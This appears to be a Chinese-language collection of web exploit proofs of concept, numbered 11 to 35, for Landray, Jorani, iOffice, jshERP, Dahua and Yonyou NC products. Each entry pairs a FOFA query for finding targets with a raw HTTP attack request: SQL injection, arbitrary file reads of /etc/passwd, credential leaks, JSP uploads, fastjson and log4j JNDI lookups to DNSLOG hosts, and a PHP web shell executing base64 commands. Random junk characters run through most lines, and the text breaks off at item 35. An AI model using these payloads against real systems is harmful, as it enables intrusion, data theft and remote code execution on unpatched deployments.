6 x. o- h' E9 P! `6 }11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入8 h, j9 o; s9 l. F$ d# F7 S ]
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"/ T' x# N7 S J% k8 W1 t* y1 c
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
+ W4 [2 \/ `% x: C W* F3 kHost: 127.0.0.1
! Y7 y, {/ m( r3 z3 t% P$ tPragma: no-cache4 S- u# D5 L2 w: {
Cache-Control: no-cache; y9 L5 n/ ^! W
Upgrade-Insecure-Requests: 1: w# Y3 Z! Y+ L* C% _0 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0 u2 G2 n. c7 ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 P7 q" }0 E% E
Accept-Encoding: gzip, deflate
* k- H& Q8 K7 R( s( N# E$ EAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
) }# n8 W+ D& A; ^Connection: close
; g$ D7 T+ H7 W, l/ S3 q3 \, Q
' f) i" y2 ~+ q9 l- c l1 T% h# G6 W3 k+ c* _ C
12. Jorani < 1.0.2 远程命令执行0 k- M1 B1 A" y" i5 ?1 ?8 {
FOFA:title="Jorani"
7 U. G" G/ f- o* U- C+ I/ a7 D7 m第一步先拿到cookie- N; o4 j' k% v2 D% P* k' e; O& L
GET /session/login HTTP/1.1
) q2 k! O, s2 |9 iHost: 192.168.190.308 Y0 V% z( ?* _) {( Z
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
: t: N4 e/ G; s) Z5 d* D* z, vConnection: close
) b- ]& b) v% o: z8 e" ZAccept-Encoding: gzip
$ G* J/ L. m2 @6 F- e, l% i- E
. b' P$ X' q& W, x! U: Y1 {* j. `7 J; V( ?9 n4 b: s& a- T
响应中csrf_cookie_jorani用于后续请求: Y" L$ z+ [( j- P
HTTP/1.1 200 OK
- V4 f6 H7 J# E+ C: C$ QConnection: close) u: T0 h6 z; y F7 }
Cache-Control: no-store, no-cache, must-revalidate7 a. r( S7 U/ X. I' Z9 h# f1 z; D" D, Y
Content-Type: text/html; charset=UTF-8
8 p: ]' p9 s/ KDate: Tue, 24 Oct 2023 09:34:28 GMT
# @+ p1 g1 i/ q q6 |4 ^. iExpires: Thu, 19 Nov 1981 08:52:00 GMT
3 F& ? O* M0 u/ VLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
$ X: c+ p9 _' D/ S3 Y4 k) VPragma: no-cache
8 \4 \5 P! b3 y3 \Server: Apache/2.4.54 (Debian)& J/ A" [' G# ~- r9 Q1 V) E5 k
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/5 s8 R, Z i; M$ E0 l
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly0 P$ u0 q X% N' q7 J
Vary: Accept-Encoding
. _' F, n% q; k6 @' S, ]4 B, G9 s0 j& ~
! ~2 m$ }' z+ E/ o( |
POST请求,执行函数并进行base64编码! E# ~" u0 g/ a+ }* a" G
POST /session/login HTTP/1.1
6 z5 r# [* ^* }' mHost: 192.168.190.308 [- [# J' @3 M+ P: x( m: j. n- ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
) ]! F8 M0 r0 kConnection: close; O' C; J) ~6 `: i
Content-Length: 252
* ^& v" v- n) R6 I8 gContent-Type: application/x-www-form-urlencoded6 B; l7 H8 L V8 o
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r0 f# q3 w3 p1 ^# u# H9 h5 d7 F. y
Accept-Encoding: gzip9 s$ [2 F% ~$ D6 o( f8 E$ }: p7 {
3 B4 O3 n2 C' e4 V, l8 [
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor3 z* \4 w# R0 d r E$ S9 D7 [
2 a8 B: e" \; ]! ], z; Z
; N2 B/ U: H2 u9 p: G
- X1 ]3 C1 o" r' |向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串 l Z/ G G% B, t% R$ I' F
GET /pages/view/log-2023-10-24 HTTP/1.1
' s9 C* x1 E' |) _' Z( S0 mHost: 192.168.190.30: i' o# c) J* S2 L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
) a. E4 b ^, E" ?# H7 AConnection: close
3 _+ T8 b. t# FCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r$ l @) O7 t& \: T: J. t
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
% a! _) Z2 w; w, R: G8 J& dX-REQUESTED-WITH: XMLHttpRequest
, m. Q |! w* u* j* rAccept-Encoding: gzip7 I( Q! E: O( K
' w4 f7 r2 f0 ^; B) v. K
! W; l/ h+ R" B% R A13. 红帆iOffice ioFileDown任意文件读取
( _2 S; v8 b$ v. |5 N/ ~FOFA:app="红帆-ioffice"6 W& ?/ ]: Q, @- c* E7 X
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
* {* S& @& C! s T6 N% }2 _Host: x.x.x.x
0 w7 T1 ?0 Z# ^8 @- gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.369 t5 O# N3 z$ s* R# K. ~
Connection: close
6 }4 ]$ d1 N; PAccept: */*2 M" k) q6 t' N" ] {
Accept-Encoding: gzip0 V5 J1 K, T3 I. a, W3 l* w$ `
/ u! {% k9 F7 z
5 ^. s$ u) D5 c14. 华夏ERP(jshERP)敏感信息泄露! f! r5 ? f; W2 K4 \! W
FOFA:body="jshERP-boot"
8 V8 d+ Y2 ?3 J$ n2 i. V% E( u泄露内容包括用户名密码! O7 ]( n, o7 `9 y9 E3 g
GET /jshERP-boot/user/getAllList;.ico HTTP/1.19 V. h/ \% _8 u; J5 ^
Host: x.x.x.x
+ \3 w6 i6 ^% _7 {: F% dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
# ?: Y- X$ l4 j& v7 F" uConnection: close
4 S# V" t' q5 v7 ~0 y& |. VAccept: */*7 K) H, ]. Q& Q& t6 v& _* P
Accept-Language: en
0 N8 k$ a9 H% Y; {Accept-Encoding: gzip3 K( M# x* z1 v" v; M" z3 N
4 J2 O" Q( R# E0 U; j3 Q8 R, {, E3 E% Z7 z. I; m U
15. 华夏ERP getAllList信息泄露. v2 m) u. J2 I# J, T- y
CVE-2024-0490
/ M6 p, l* Z7 X0 nFOFA:body="jshERP-boot"# s8 o* L7 t9 f9 h& Z
泄露内容包括用户名密码
8 n& {% R3 f- g9 G; n3 a3 s$ O( k# dGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1) {. n% b$ { T
Host: 192.168.40.130:100 i+ B2 A4 M7 g7 b4 I" d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
- e ^, ?8 b% L7 h( a% ?! U" [! o. DConnection: close
* a* Q) |; k6 l4 K) wAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.85 a. ]% _6 X1 {2 E3 j
Accept-Language: en7 J5 K# z" z" w8 U+ a( D- [
sec-ch-ua-platform: Windows( ]; b* A/ j8 i' @+ { P) x
Accept-Encoding: gzip
! w0 D9 Q" V6 Z" k% ]
& @! P9 y9 @% t( d' B3 s! O% h6 l& S5 Q3 ^( R! _. Q' Y
16. 红帆HFOffice医微云SQL注入- y |9 G6 V# x
FOFA:title="HFOffice"4 T4 i* X1 G. [5 }
poc中调用函数计算1234的md5值: m6 Y- U( S$ }5 C+ l( p
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
* \8 m {* L6 t$ p- D3 NHost: x.x.x.x. J0 V! ^$ K& e9 t
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
" b/ x7 M' A! VConnection: close" M9 I, S! ^7 E4 ~! k m& h2 |9 L
Accept: */*6 k0 Y0 o- L' C. Y5 ~ z- s% H
Accept-Language: en
' I' K9 O9 q# nAccept-Encoding: gzip) T% V% x+ I3 o1 Z
N7 @7 j: g* M7 V1 I- R
$ b1 L" K/ z* L& {* ~/ C1 g17. 大华 DSS itcBulletin SQL 注入
1 O4 C$ Z% o! u( Y( b6 AFOFA:app="dahua-DSS") V: o1 l1 C! J
POST /portal/services/itcBulletin?wsdl HTTP/1.11 z* W7 @0 }( P7 ^$ E/ A5 v
Host: x.x.x.x
6 x% {* n7 @1 P" i# U0 r6 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( j/ b7 p' @; a' E" g `0 sConnection: close
1 c$ n& H# }' p- t i( aContent-Length: 345! b2 r/ C2 l6 a- z
Accept-Encoding: gzip
: u( {8 J% N& C" L& o; Q' J+ D; |$ U. r
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>8 }; F+ U% W2 C) e3 \
<s11:Body>. j; N0 T% C9 h. }( H1 K
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
W4 F" b) m u9 o7 C <netMarkings>
: S5 p3 l/ k, a" w0 W (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=16 N- d6 V/ a# k7 M$ C% }
</netMarkings>, E& |2 }$ @8 r( y
</ns1:deleteBulletin>
9 ]& ^3 n. I" A( [$ O- c# f </s11:Body>
' E7 |! @' ], Y; S& a# I</s11:Envelope>
+ l4 V8 o/ n) I9 q
' A' k" T1 U1 d
2 Z* H; p1 N5 t# }0 A9 }18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
: n, W1 C- p* K4 tFOFA:app="dahua-DSS"
$ U# t& ~$ P/ n5 g9 j0 KGET /admin/cascade_/user_edit.action?id=1 HTTP/1.12 G, ^( b, v4 a
Host: your-ip i, ?( ]8 w0 S* f& q) ~. R: A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* N7 p" \4 {+ v$ ~% {9 ?) s, X% u
Accept-Encoding: gzip, deflate5 G5 \* F% T7 t9 h
Accept: */*8 C, r0 C' ~" O; V" |, D6 p
Connection: keep-alive2 P' m5 T7 h0 M o1 K
* x- p1 H5 @/ C9 I3 Y
( F% ]7 m8 x/ e% N! E2 t( ~3 k {! Z% F! q9 }4 L! R$ F
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入) I+ Z7 l9 I3 B5 @1 [* A, I
FOFA:app="dahua-DSS", A' ?; e. M+ y ]( d/ I/ C
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
& |/ [8 G' y2 X; M% P/ `6 hHost:* [$ W8 o0 l5 _& T
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36- U$ k$ f8 U, t$ e" g O8 ^
Accept-Encoding: gzip, deflate) g3 `+ h' k4 E7 f
Accept: */*. H' Q1 B! s% L' x/ J& ]
Connection: keep-alive& \; |9 C/ L9 F! C! m F
3 Q' B) ]% L$ f+ D
# i) E, C6 a9 c* `3 X20. 大华ICC智能物联综合管理平台任意文件读取
3 U6 @/ y4 [" L. pFOFA:body="*客户端会小于800*"
5 f& N2 K- r0 v: b; w& TGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
% |* W4 T( `* I8 e7 |$ xHost: x.x.x.x
6 D$ Z; a) T6 y9 g; x- {User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.360 Z% O/ e$ A% ~. D* o
Connection: close
8 ]. @% b% h' Y9 K# q* aAccept: */*
; y2 I) Y7 V& k3 i. F& ?0 y' }Accept-Language: en1 A# G0 z# m: P4 H
Accept-Encoding: gzip
: @0 Z* P% }% \# ~4 R- e5 V" Q( \, [& u' Q4 e, z2 ^5 P! ^8 j
4 `! k. }' i. \' F; }
21. 大华ICC智能物联综合管理平台random远程代码执行
; F- p' t; B: ]3 F. [5 @2 SFOFA:icon_hash="-1935899595"" w/ j3 l6 L. `- R* ^7 y# i& x9 b
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1/ E2 p' g; o4 d; g4 a6 H# c! G1 F
Host: x.x.x.x: h- `! {' J2 `! Y% U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 y6 t0 z' t1 j7 P) O
Content-Length: 161
, ]. n/ D, K8 SAccept-Encoding: gzip2 t2 H* @/ n0 h3 M/ X
Connection: close
$ M, X2 w. {; E D0 J6 a' F. R& F# gContent-Type: application/json;charset=utf-8
/ k/ G7 }0 O' S* d: U- s# o* r' ^7 S/ F
{
+ E4 ]8 p/ b! [, o* |"a":{; m) g. P( L, a# T5 A5 Q2 n a
"@type":"com.alibaba.fastjson.JSONObject",
1 R2 A4 z4 _4 Q1 i# _ {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
8 N- i3 k4 {5 A* d8 i. h3 u9 Z }""
; D1 l( {, q+ F1 Y) c5 j3 T}; U& Q E, K1 a3 R! C
- o. P: j M9 _0 ^
% W6 g# ?. P1 t, \8 P$ G- S
22. 大华ICC智能物联综合管理平台 log4j远程代码执行: p5 F& q3 f. W1 F
FOFA:icon_hash="-1935899595"
5 D. E2 H q9 g& ~) V1 K) NPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1+ B, K5 V( P8 J# {2 Q( v: T4 l9 {8 [
Host: your-ip; F, p$ i& q2 L0 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
' {1 `0 A7 Q; D: w6 R6 kContent-Type: application/json;charset=utf-82 Z7 X/ c- D% a: {" U
: I+ U& a& z6 L5 ]8 r8 B- ?{
2 H/ x8 k6 t, `6 v9 {9 X6 L+ {"loginName":"${jndi:ldap://dnslog}"
" m; t& g% Y4 d7 M4 T- U& K1 i}# O- V8 c4 f/ H4 q
7 Z( n. Y0 F! ?7 D" ?8 g
3 q! l8 J& v- |- q q! \* t1 N
1 A4 N, q8 A6 o4 e4 \23. 大华ICC智能物联综合管理平台 fastjson远程代码执行" z) W! G0 B5 ?
FOFA:icon_hash="-1935899595"
, j! v% x9 S5 [8 q2 U' UPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
2 u8 n- j; Z1 p+ ~9 Z4 a$ L4 z2 qHost: your-ip
9 A2 O- G: E# B: oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 R: t$ k2 r ?" g+ e
Content-Type: application/json;charset=utf-8
$ t. E; Q+ h/ qAccept-Encoding: gzip' A( e$ L& {' |- q
Connection: close+ W6 ~) Z4 Y; k& l2 n' s3 J. k
/ P5 C. \$ b( c; n{# E3 o) }4 n7 Y" m; W
"a":{
, z2 E& J: [) s' M4 y1 r1 `! L, P "@type":"com.alibaba.fastjson.JSONObject",* b& J8 F2 u( e/ a8 A
{"@type":"java.net.URL","val":"http://DNSLOG"}4 F+ f3 X) ?" X0 m8 r2 `3 j0 W7 _
}""; c1 L3 w$ K; r5 h2 Z$ e1 J; j
}' D- y4 N& P9 r; r
7 N. x+ c5 |& P% [* O2 P/ \
; }) t/ w3 O) z) A9 p1 U24. 用友NC 6.5 accept.jsp任意文件上传
, E3 I6 k! ~- T- PFOFA:icon_hash="1085941792"
+ s3 M- x6 N V2 L) KPOST /aim/equipmap/accept.jsp HTTP/1.1
. F. {" Z8 h( a( ]0 ~/ \4 l3 V# _. THost: x.x.x.x
8 O- g; A) \9 |" I8 X3 [/ I7 CUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
; r( r) G) k- }" fConnection: close6 b3 r# M/ }2 ?" W
Content-Length: 449: W2 d) I3 {$ U k8 g6 {9 D
Accept: */*
* _1 Z9 G' I, ^# wAccept-Encoding: gzip
! I' q- N I7 ]) C& E4 eContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc! X! p! B% t" f$ I& H% R
" r! u- d# a7 ?7 [# Z* \-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
$ U) V1 H R+ y7 sContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"6 d# X0 J' {3 u2 }& A$ k: z
Content-Type: text/plain
& s+ W8 b) D2 k4 i' ~" d6 B% e# v& @. b* d( _5 C- y7 b5 J
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
' m( [0 E2 x c# X-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc- f$ E ~$ n% A: Y
Content-Disposition: form-data; name="fname"1 ]- k! q R; u3 c m
# T; p* n* S# H: I3 n- Z\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp' u" J' r% H, _( T
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
$ w3 _+ w2 Q2 H0 I+ ~$ d; @" ]1 o- m6 M/ g+ I8 g( q" q0 O2 u
( N# W' ^8 a2 i4 j% T
25. 用友NC registerServlet JNDI 远程代码执行% t) w. N( N4 y
FOFA:app="用友-UFIDA-NC"7 h3 ~# H& p. K9 N2 i
POST /portal/registerServlet HTTP/1.1
) G% Z' I# h' J8 w d6 S; fHost: your-ip1 `2 s& z- i ]1 V% N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0+ `5 z5 K7 y+ ] Q+ _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9! F! Q* G& e; H
Accept-Encoding: gzip, deflate
) }( }4 ~" w6 }0 ~- F: n$ Z( yAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6: a; b; n" ^$ C6 _
Content-Type: application/x-www-form-urlencoded
! s. L4 [5 |& x; S1 y8 y p- G& ?4 J
type=1&dsname=ldap://dnslog5 F& A& B/ \5 w. o; m
$ Y! U4 m/ Y J% A+ E$ x$ v
- F& z; J* z' k; P& ~1 n+ {, z
26. 用友NC linkVoucher SQL注入
8 Q; q/ L: D/ a3 M2 }9 dFOFA:app="用友-UFIDA-NC"! n6 @- }- p& m' l
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
( u* K- `+ c+ B7 x) r* l+ x* UHost: your-ip
# _* `$ E6 d! }7 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ f5 t: J) G* S8 y9 Z( R; e, L% \Content-Type: application/x-www-form-urlencoded
3 E, \. t* A% A9 QAccept-Encoding: gzip, deflate) g" o3 s3 d6 `0 I) n! s' |2 k
Accept: */*; \5 \8 g9 i8 M) s0 K
Connection: keep-alive
' F5 ?% r1 U. a* |4 ]
! I" N H# V+ u( r9 t" R. t4 S
& A$ Z9 q6 L# D+ L/ M; ]& n5 ~27. 用友 NC showcontent SQL注入2 N8 X/ d4 k, u" v/ `* @. \) @
FOFA:icon_hash="1085941792"7 k0 C) a$ v$ H' y- R2 _3 \: V! I
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1- F R2 o/ e! @% F' C5 R* M2 d
Host: your-ip* G- ]2 u2 o& X; `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: c% j1 j: V E0 u7 x. T1 {Accept-Encoding: identity
1 M+ w* S7 d$ w6 q U; n/ PConnection: close
r3 C% b! n, ]% {) aContent-Type: text/xml; charset=utf-8
( I6 K1 o' r1 T% k: ?& d
8 R' _; _6 Z- W, q! B3 e6 L
2 f$ t" f. Z6 l3 y1 u. C J28. 用友NC grouptemplet 任意文件上传6 w: S6 v( T% q% [( L: i
FOFA:icon_hash="1085941792"
5 F! ?: b* o5 @* A. yPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.11 L: j5 z* X6 E, O4 V0 G6 K, g! ]9 B
Host: x.x.x.x
5 z- D' g& X6 g. I' IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
: R' S- Y; x- \Connection: close
3 W- B( I. b1 o6 O: s) [Content-Length: 2685 @0 D p, q) N& M
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk' h) e+ l6 g1 ~9 z6 R
Accept-Encoding: gzip
, F4 |9 T$ A+ L/ x
1 ]3 D5 x' x6 w" F; }& G------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk+ ~! i0 `8 ?( ]/ U: T t/ J
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp") m6 ? {1 d" @6 o. j
Content-Type: application/octet-stream. R4 v, e6 Z. y6 ]9 I
% C4 K, `9 Q# v% O' @: R: {<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
' s& C3 `/ @8 U------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
: ^7 I- l( n# Z. v$ o& S {
# }9 o6 J6 j( s5 D y, e' e( f, t; c8 X1 ?1 ~: G6 M
/uapim/static/pages/nc/head.jsp% d& z7 D2 u* V
& l- z8 a% U' k5 R! Y29. 用友NC down/bill SQL注入
. o: r; S$ k" W+ i/ Y; HFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"$ ]0 M. l* ~# f7 c4 ]
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1 W0 d" C0 r6 M
Host: your-ip
% u5 o7 S: w( V: eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
; N* U: z9 j6 \Content-Type: application/x-www-form-urlencoded
. D# b$ S( X) T7 Q( PAccept-Encoding: gzip, deflate
. M7 X/ N6 P U6 i' y: cAccept: */*
; I' ]. W3 }- H4 g8 i' tConnection: keep-alive9 f( |5 _0 o' F
4 Q" l6 _: {6 t; L
2 k3 ]8 f( D7 K( y4 S; v+ h
30. 用友NC importPml SQL注入
8 j+ @2 {/ H3 O" WFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
2 j( ]: b# b5 O0 [ B& ]* aPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1- F8 g% }3 b9 K2 X
Host: your-ip; f, V0 X& d3 a0 T ~" a4 F
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V0 t9 m' i7 K4 G5 l! \& n, |7 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' d" `/ C* K( i9 _6 b+ x; p) ?- q5 HConnection: close0 z5 z# p6 ?, E" K- Q
4 n0 j. O8 _3 }/ R4 Q------WebKitFormBoundaryH970hbttBhoCyj9V
2 F( q, x4 ?! X/ GContent-Disposition: form-data; name="Filedata"; filename="1.jpg"; u7 ~* ^! Y$ z$ P
Content-Type: image/jpeg
6 Y! V. p+ F% V" m( J------WebKitFormBoundaryH970hbttBhoCyj9V--
' I, \# z7 f( V) ?- u' {4 u d o/ Y1 X& I' V, X
* y3 D! n8 q- W
31. 用友NC runStateServlet SQL注入
0 k. W1 y0 u/ {! H9 V. [- b) Eversion<=6.5, i) ?: t3 J5 s8 U2 [- j
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
1 Y+ h& W; s4 D! h+ IGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1, h8 y9 N# `' c0 z7 W
Host: host- s0 k2 h* U/ r5 M% ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36: C+ U/ R( N/ o8 ]& n& d! X: o
Content-Type: application/x-www-form-urlencoded
4 @9 H; @( }, m" \ s! Q) \$ i2 r; s
1 @2 A) I# A" @
$ {. `2 z/ {/ }1 |5 l: ]32. 用友NC complainbilldetail SQL注入
" o3 C3 F8 _5 c* S3 | S8 t2 Gversion= NC633、NC657 V) W* R- l$ j! F' E
FOFA:app="用友-UFIDA-NC"' Y5 z5 t H; P( M# w# }
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1$ e1 x4 V2 X! Y0 Q3 R/ U# ^
Host: your-ip4 [: [/ J9 s) G# s! `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 o5 k% c3 a$ r8 G7 M
Content-Type: application/x-www-form-urlencoded! n* _# u7 P; y6 l% |9 U
Accept-Encoding: gzip, deflate2 m: A; k1 M/ ~/ U- N1 A
Accept: */* N/ l6 H2 ~# K% e
Connection: keep-alive9 }* I# @7 u5 \# H
' t' ? a$ M ~ V3 g- U) O# U% Q# }0 q: b: K' K: I
33. 用友NC downTax/download SQL注入& b; C- L1 g: Q I$ B" R. n5 ^- H) R
version:NC6.5FOFA:app="用友-UFIDA-NC"
; `; Y7 v! j* l5 |GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.18 ~. @0 e" {# J" a% G% R' B+ |
Host: your-ip
" { J$ R9 k# l3 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# o& q( N5 z. }% [" z) E" O
Content-Type: application/x-www-form-urlencoded
) W% f5 M5 q; A: vAccept-Encoding: gzip, deflate
5 J# _& l7 O. x' `( s K) ?% gAccept: */*
- V w+ A# m, d1 D0 `7 z8 _/ ?# QConnection: keep-alive
0 @, H6 b) u+ U2 Z: i& w( _; z$ F A' d( t& Y2 j- s
; ~- l, M" \/ B. G34. 用友NC warningDetailInfo接口SQL注入4 X {8 c6 c; L } M3 K; c* u8 G
FOFA:app="用友-UFIDA-NC"
' ~; v- F+ D/ V% S% G8 _1 b AGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
/ h. p* j D. |& O& LHost: your-ip
. D a, r/ Z! e+ bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ y9 w0 F% Y z% p ^# Z
Content-Type: application/x-www-form-urlencoded
I5 k. R; P( qAccept-Encoding: gzip, deflate8 b7 S9 ~7 i8 L" h
Accept: */*
: u- e T5 e0 y2 GConnection: keep-alive! m) V9 z1 v+ N) d9 P
; s; C. N( Y9 i% i4 y1 L6 T' o0 i+ k% z/ F4 X( V$ ]
35. 用友NC-Cloud importhttpscer任意文件上传. C3 `$ L b& \# i6 V
